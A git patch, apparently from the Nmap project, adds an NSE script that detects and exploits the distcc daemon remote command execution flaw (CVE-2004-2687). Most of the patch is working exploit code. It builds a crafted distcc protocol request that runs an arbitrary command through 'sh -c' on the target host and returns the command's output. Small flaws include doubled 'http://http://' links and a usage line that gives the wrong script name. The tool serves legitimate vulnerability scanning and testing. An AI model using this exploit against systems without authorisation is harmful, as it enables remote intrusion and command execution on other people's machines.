From 322ed971a2e690f9c0bef849b9a470afd575c6ea Mon Sep 17 00:00:00 2001
From: patrik <patrik@e0a8ed71-7df4-0310-8962-fdc924857419>
Date: Sat, 19 May 2012 17:39:53 +0000
Subject: [PATCH] o Added the script distcc-CVE-2004-2687 that checks and
 exploits a remote   command execution vulnerability in distcc. [Patrik
 Karlsson]

---
 CHANGELOG                        |   3 +
 scripts/distcc-CVE-2004-2687.nse | 103 +++++++++++++++++++++++++++++++
 scripts/script.db                |   1 +
 3 files changed, 107 insertions(+)
 create mode 100644 scripts/distcc-CVE-2004-2687.nse

diff --git a/CHANGELOG b/CHANGELOG
index 7f17d1093..ad59e4093 100644
--- a/CHANGELOG
+++ b/CHANGELOG
@@ -1,5 +1,8 @@
 # Nmap Changelog ($Id$); -*-text-*-
 
+o Added the script distcc-CVE-2004-2687 that checks and exploits a remote
+  command execution vulnerability in distcc. [Patrik Karlsson]
+
 o Added two new scripts mysql-query and mysql-dump-hashes, which add support
   for performing custom MySQL queries and dump MySQL password hashes. [Patrik
   Karlsson]
diff --git a/scripts/distcc-CVE-2004-2687.nse b/scripts/distcc-CVE-2004-2687.nse
new file mode 100644
index 000000000..cacc756ec
--- /dev/null
+++ b/scripts/distcc-CVE-2004-2687.nse
@@ -0,0 +1,103 @@
+description = [[
+Detects and exploits a remote code execution vulnerability in the distributed
+compiler daemon distcc. The vulnerability was disclosed in 2002, but is still
+present in modern implementation due to poor configuration of the service.
+]]
+
+---
+-- @usage
+-- nmap -p 3632 <ip> --script distcc-exec --script-args="distcc-exec.cmd='id'"
+--
+-- @output
+-- PORT     STATE SERVICE
+-- 3632/tcp open  distccd
+-- | distcc-test: 
+-- |   VULNERABLE:
+-- |   distcc Daemon Command Execution
+-- |     State: VULNERABLE (Exploitable)
+-- |     IDs:  CVE:CVE-2004-2687
+-- |     Risk factor: High  CVSSv2: 9.3 (HIGH) (AV:N/AC:M/Au:N/C:C/I:C/A:C)
+-- |     Description:
+-- |       Allows executing of arbitrary commands on systems running distccd 3.1 and
+-- |       earlier. The vulnerability is the consequence of weak service configuration.
+-- |       
+-- |     Disclosure date: 2002-02-01
+-- |     Extra information:
+-- |       
+-- |     uid=118(distccd) gid=65534(nogroup) groups=65534(nogroup)
+-- |   
+-- |     References:
+-- |       http://distcc.googlecode.com/svn/trunk/doc/web/security.html
+-- |       http://http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-2687
+-- |       http://http://www.osvdb.org/13378
+-- |_      http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2687
+--
+-- @args cmd the command to run at the remote server
+--
+
+categories = {"exploit", "intrusive", "vuln"}
+
+local shortport = require('shortport')
+local vulns     = require('vulns')
+
+portrule = shortport.port_or_service(3632, "distcc")
+
+local arg_cmd = stdnse.get_script_args(SCRIPT_NAME .. '.cmd') or "id"
+
+local function fail(err) return ("\n  ERROR: %s"):format(err or "") end
+
+action = function(host, port)
+
+	local distcc_vuln = {
+		title = "distcc Daemon Command Execution",
+		IDS = {CVE = 'CVE-2004-2687'},
+		risk_factor = "High",
+		scores = {
+			CVSSv2 = "9.3 (HIGH) (AV:N/AC:M/Au:N/C:C/I:C/A:C)",
+		},
+		description = [[
+Allows executing of arbitrary commands on systems running distccd 3.1 and
+earlier. The vulnerability is the consequence of weak service configuration.
+]],
+		references = {
+			'http://http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-2687',
+			'http://http://www.osvdb.org/13378',
+			'http://distcc.googlecode.com/svn/trunk/doc/web/security.html',
+    	},
+		dates = { disclosure = {year = '2002', month = '02', day = '01'}, },
+		exploit_results = {},
+	}
+
+	local report = vulns.Report:new(SCRIPT_NAME, host, port)
+	distcc_vuln.state = vulns.STATE.NOT_VULN
+
+	local socket = nmap.new_socket()
+	if ( not(socket:connect(host, port)) ) then
+		return fail("Failed to connect to distcc server")
+	end
+	
+	local cmds = {
+		"DIST00000001",
+		("ARGC00000008ARGV00000002shARGV00000002-cARGV%08.8xsh -c " .. 
+		 "'(%s)'ARGV00000001#ARGV00000002-cARGV00000006main.cARGV00000002" ..
+		 "-oARGV00000006main.o"):format(10 + #arg_cmd, arg_cmd),
+		"DOTI00000001A\n",
+	}
+	
+	for _, cmd in ipairs(cmds) do
+		if ( not(socket:send(cmd)) ) then
+			return fail("Failed to send data to distcc server")
+		end
+	end
+	
+	local status, data = socket:receive_buf("DOTO00000000")
+
+	if ( status ) then
+		local output = data:match("SOUT%w%w%w%w%w%w%w%w(.*)")
+		if (output and #output > 0) then
+			distcc_vuln.extra_info = stdnse.format_output(true, output)
+			distcc_vuln.state = vulns.STATE.EXPLOIT
+			return report:make_output(distcc_vuln)
+		end
+	end
+end
\ No newline at end of file
diff --git a/scripts/script.db b/scripts/script.db
index 42af14048..06a4a1e62 100644
--- a/scripts/script.db
+++ b/scripts/script.db
@@ -66,6 +66,7 @@ Entry { filename = "db2-das-info.nse", categories = { "discovery", "safe", "vers
 Entry { filename = "db2-discover.nse", categories = { "default", "discovery", "safe", } }
 Entry { filename = "dhcp-discover.nse", categories = { "discovery", "safe", } }
 Entry { filename = "dict-info.nse", categories = { "discovery", "safe", } }
+Entry { filename = "distcc-CVE-2004-2687.nse", categories = { "exploit", "intrusive", "vuln", } }
 Entry { filename = "dns-blacklist.nse", categories = { "external", "safe", } }
 Entry { filename = "dns-brute.nse", categories = { "discovery", "intrusive", } }
 Entry { filename = "dns-cache-snoop.nse", categories = { "discovery", "intrusive", } }